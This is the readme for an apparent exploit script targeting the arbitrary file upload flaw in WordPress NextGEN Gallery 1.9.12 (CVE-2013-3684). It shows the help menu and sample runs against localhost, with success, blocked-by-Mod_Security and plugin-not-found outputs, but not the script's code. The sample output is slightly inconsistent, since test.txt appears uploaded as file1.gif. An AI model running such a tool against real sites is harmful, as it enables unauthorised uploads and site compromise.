cve-2013-3684.py
readme.txt

readme.txt

[The below example shows the help menu]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress  -h
usage: cve-2013-3684.py [-h] -i IP -u URI

NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)
optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        IP address or host name
  -u URI, --uri URI     URI path /wordpress
  -f FILE, --file FILE  File to upload
--------------------------------------------------------------------------------------------------


[The below example shows that NextGEN Gallery is found on host and attempt is successful]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt
[*] Wordpress Plugin: NextGEN Gallery found
[*] File has been uploaded successfully. Please check the below location

******************************************************************************
http://127.0.0.1/wordpress/wordpress/wp-content/[gallery_name]/file1.gif
******************************************************************************
--------------------------------------------------------------------------------------------------


[The below example shows that NextGEN Gallery is found on host but attempt is unsuccessful]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt
[*] Wordpress Plugin: NextGEN Gallery found
[*] Failed: NextGEN Gallery is not vulnerable or attempt has been blocked
******************************************************************************
(406, 'Not Acceptable', '<head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>')
******************************************************************************
--------------------------------------------------------------------------------------------------


[The below example shows that NextGEN Gallery is not found on host]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress1
[*] Wordpress Plugin: NextGEN Gallery NOT found
--------------------------------------------------------------------------------------------------